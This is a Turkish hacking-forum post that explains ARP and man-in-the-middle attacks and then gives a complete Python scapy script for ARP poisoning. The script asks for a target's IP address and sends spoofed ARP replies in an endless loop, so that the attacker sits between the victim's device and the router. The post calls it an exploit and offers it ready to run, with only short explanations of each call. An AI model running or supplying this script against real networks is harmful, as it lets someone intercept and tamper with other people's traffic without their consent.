İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

MITM (Man in the middle) Attack

Mapzilla - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2016
Nereden:
127.0.0.1:80
Yaş:
15
Mesajlar:
5.066
Konular:
277
Teşekkür (Etti):
701
Teşekkür (Aldı):
1054
Ticaret:
(0) %
28-03-2019 19:33
#1
MITM (Man in the middle) Attack
ARP (Address Resolution Protocol) nedir?

Local Area Networkde (LAN) Internet Protocol (IP) adresi bilinen cihazın Media Access Control (MAC) adresini bulan bi' protokoldür. Genellikle OSI modelinde 2. sıradadır.



IP-MAC eşleşmesi için komut satırına veya terminale arp -a yazarak sonuçlara bakabilirsiniz.



Görüldüğü üzere 192.168.1.35 IP adresli cihaz benim telefonum, 192.168.1.33 IP adresli cihaz benim bilgisayarım. Karşılarında da MAC adresleri gözükmekte.

MITM (Man In The Middle) nedir?

MITM, cihaz ile gateway arasındaki yolu zehirler, gateway ve cihaz arasındaki istekleri attackera yönlendirir.



Bunu daha iyi açıklamak için scapy kütüphanesi ile bi' tane Python exploiti yazalım. Şimdi ilk ARP request ile MAC adreslerini öğreneceğiz, sonra ARP reply ile poisoning işlemini başlatacağız.

Kod:
#Turkhackteam.org 

from scapy.all import * 
 
def getMacAddress(IPAddress):
    ans,unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=IPAddress),timeout=1,retry=1)
    for k,j in ans:
        return j[ARP].hwsrc
    exit(4)
    
            
def manInTheMiddleAttack(VictimIPAddress,VictimMacAddress,RouterIPAddress,RouterMacAddress,HackerMacAddress):    
    while 1:    
        send(ARP(op=2,psrc=VictimIPAddress,pdst=RouterIPAddress,hwdst=RouterMacAddress,hwsrc=HackerMacAddress))
        send(ARP(op=2,psrc=RouterIPAddress,pdst=VictimIPAddress,hwdst=VictimMacAddress,hwsrc=HackerMacAddress))
        
VIA = str(input("Saldırılacak kişinin IP adresi: "))
VMA = getMacAddress(VIA)
########################
RIA = str(input("Routerınızın IP adresi: "))
RMA = getMacAddress(RIA)
########################
HIA = str(input("IP adresiniz: "))
HMA = getMacAddress(HIA)

thread = Thread(target=manInTheMiddleAttack,args=(VIA,VMA,RIA,RMA,HMA))
thread.start()

Burada yaptığımız işlem kendimi routera mobil cihaz olarak göstermek ve kendimi mobil cihaza router olarak göstermek.

srp() -> Bunu response alacağımız için kullandık.
--- k Destination, j ise Sourcedür.
exit(4) -> Genelde network hataları olduğunda 4 numarasıyla çıkıldığı için 4 yazdım.
send() -> Paket göndermeye yarar.

Yararlanılan kaynaklar -> https://scapy.readthedocs.io/en/latest/
Konu Mapzilla tarafından (28-03-2019 19:45 Saat 19:45 ) değiştirilmiştir.
Barrier Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı